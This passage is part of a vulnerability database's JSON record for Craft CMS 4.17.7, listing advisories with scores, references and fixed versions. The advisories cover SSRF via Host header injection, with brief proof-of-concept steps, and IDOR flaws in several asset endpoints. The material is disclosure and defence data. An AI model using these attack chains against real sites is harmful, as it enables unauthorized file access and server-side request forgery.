"reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/4.17.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/4.17.8" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/5.9.14" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33160", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33160" }, { "reference_url": "https://github.com/craftcms/cms/commit/7290d91639e", "reference_id": "7290d91639e", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/" } ], "url": "https://github.com/craftcms/cms/commit/7290d91639e" }, { "reference_url": "https://github.com/advisories/GHSA-5pgf-h923-m958", "reference_id": "GHSA-5pgf-h923-m958", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5pgf-h923-m958" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113239?format=api", "purl": "pkg:composer/craftcms/cms@4.17.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/113238?format=api", "purl": "pkg:composer/craftcms/cms@5.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-a8p2-5cmc-n7g2" }, { "vulnerability": "VCID-asek-4gme-gug8" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14" } ], "aliases": [ "CVE-2026-33160", "GHSA-5pgf-h923-m958" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fpke-p7sz-nfc9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89272?format=api", "vulnerability_id": "VCID-gzry-xtu5-ukhu", "summary": "Craft CMS has a host header injection leading to SSRF via resource-js endpoint\n### Summary\n\nThe `resource-js` endpoint in Craft CMS allows unauthenticated requests to proxy remote JavaScript resources. \nWhen `trustedHosts` is not explicitly restricted (default configuration), the application trusts the client-supplied Host header. \n\nThis allows an attacker to control the derived `baseUrl`, which is used in prefix validation inside `actionResourceJs()`. \nBy supplying a malicious Host header, the attacker can make the server issue arbitrary HTTP requests, leading to Server-Side Request Forgery (SSRF).\n\n### Details\n\nThe vulnerability exists in `AppController::actionResourceJs()`.\n\nThe function validates that the `url` parameter starts with `assetManager->baseUrl`. However, `baseUrl` is derived from the current request host. If `trustedHosts` is not configured, the Host header is fully attacker-controlled.\n\nAttack chain:\n\n1. Attacker sends request with controlled `Host` header.\n2. Application derives `baseUrl` from the malicious Host.\n3. `url` parameter is required to start with this `baseUrl`.\n4. Validation passes.\n5. Guzzle performs a server-side HTTP request to the attacker-controlled host.\n6. SSRF occurs.\n\nThis does not rely on string parsing bypass. It relies on Host header trust.\n\n### PoC (safe reproduction steps)\n\nEnvironment:\n- Craft CMS 5.9.12\n- Default configuration (no trustedHosts restriction)\n- Docker deployment\n\n1. Start a listener inside the container:\n python3 -m http.server 9999\n\n2. Send a request to resource-js with a controlled Host header.\n\n3. Observe that the internal listener receives a request (OOB confirmation).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41130", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1631", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41130" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/" } ], "url": "https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41130", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41130" }, { "reference_url": "https://github.com/advisories/GHSA-95wr-3f2v-v2wh", "reference_id": "GHSA-95wr-3f2v-v2wh", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-95wr-3f2v-v2wh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110279?format=api", "purl": "pkg:composer/craftcms/cms@4.17.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/110278?format=api", "purl": "pkg:composer/craftcms/cms@5.9.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-asek-4gme-gug8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15" } ], "aliases": [ "CVE-2026-41130", "GHSA-95wr-3f2v-v2wh" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gzry-xtu5-ukhu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91453?format=api", "vulnerability_id": "VCID-nmzu-mefv-tqeh", "summary": "Craft CMS' anonymous \"assets/image-editor\" calls return private asset editor metadata to unauthorized users\n### Summary\n\nA low-privileged authenticated user can call `assets/image-editor` with the ID of a private asset they cannot view and still receive editor response data, including `focalPoint`.\n\nThe endpoint returns private editing metadata without per-asset authorization validation.\n\nRoot-cause analysis:\n\n1. `actionImageEditor()` accepts `assetId` from the request body.\n2. The asset is loaded, and the focal-point data is read.\n3. Response returns `html` and `focalPoint`.\n4. No explicit authorization check is applied before the response.\n\n### Impact\n\n## Affected deployments:\n\n* Craft sites where asset edit metadata should remain restricted to authorized users.\n\n## Security consequence:\n\n* Unauthorized users can extract private editor metadata and related editor context for inaccessible assets.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33161", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.1307", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33161" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/" } ], "url": "https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/4.17.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/4.17.8" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/5.9.14" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33161", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33161" }, { "reference_url": "https://github.com/advisories/GHSA-vgjg-248p-rfm2", "reference_id": "GHSA-vgjg-248p-rfm2", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-vgjg-248p-rfm2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113239?format=api", "purl": "pkg:composer/craftcms/cms@4.17.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/113238?format=api", "purl": "pkg:composer/craftcms/cms@5.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-a8p2-5cmc-n7g2" }, { "vulnerability": "VCID-asek-4gme-gug8" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14" } ], "aliases": [ "CVE-2026-33161", "GHSA-vgjg-248p-rfm2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzu-mefv-tqeh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91774?format=api", "vulnerability_id": "VCID-sa99-8awj-eycd", "summary": "Craft CMS: Authorized asset \"preview file\" requests bypass allows users without asset access to retrieve private preview metadata\n### Summary\n\nAn authenticated low-privileged user can call `assets/preview-file` for an asset they are not authorized to view and still receive preview response data (`previewHtml`) for that private asset.\n\nThe returned preview HTML included a private preview image route containing the target private `assetId`, even though `canView` was `false` for the attacker account.\n\n### Details\n\n1. `assets/preview-file` accepts a maliciously controlled `assetId` and renders preview output.\n2. The action does not enforce per-asset view authorization prior to returning preview content.\n 3. As a result, an authenticated user without asset-view permission can still obtain private preview output.\n\nThis affects Craft installations with authenticated users of mixed privilege levels with private assets.\n\n### Resources\n\n- d30df3112220db1ffd6726a3ed11857014c7fb27\n- b1cddf72c98a", "references": [ { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db" }, { "reference_url": "https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq" }, { "reference_url": "https://github.com/advisories/GHSA-44px-qjjc-xrhq", "reference_id": "GHSA-44px-qjjc-xrhq", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-44px-qjjc-xrhq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113239?format=api", "purl": "pkg:composer/craftcms/cms@4.17.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/113238?format=api", "purl": "pkg:composer/craftcms/cms@5.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-a8p2-5cmc-n7g2" }, { "vulnerability": "VCID-asek-4gme-gug8" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14" } ], "aliases": [ "GHSA-44px-qjjc-xrhq" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sa99-8awj-eycd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91375?format=api", "vulnerability_id": "VCID-tzjk-x116-ayge", "summary": "Craft CMS: Low-privilege users could read private asset contents when editing an asset (IDOR)\n### Summary\n\nA low-privileged authenticated user can read private asset content by calling `assets/edit-image` with an arbitrary `assetId` that they are not authorized to view.\n\nThe endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files.\n\n### Details\n\nRoot cause:\n - A user-controlled object reference (`assetId`) is used to load and return sensitive content.\n - The action does not verify whether the current user is authorized to view that asset.\n - This creates an authenticated IDOR / authorization bypass.\n\n### Impact\n\n- Craft installations where private/non-public assets exist and low-privileged users can authenticate.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33158", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0389", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33158" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/" } ], "url": "https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/4.17.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/4.17.8" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/5.9.14" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33158", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33158" }, { "reference_url": "https://github.com/advisories/GHSA-3pvf-vxrv-hh9c", "reference_id": "GHSA-3pvf-vxrv-hh9c", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3pvf-vxrv-hh9c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113239?format=api", "purl": "pkg:composer/craftcms/cms@4.17.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/113238?format=api", "purl": "pkg:composer/craftcms/cms@5.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-a8p2-5cmc-n7g2" }, { "vulnerability": "VCID-asek-4gme-gug8" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14" } ], "aliases": [ "CVE-2026-33158", "GHSA-3pvf-vxrv-hh9c" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tzjk-x116-ayge" } ], "fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.7" }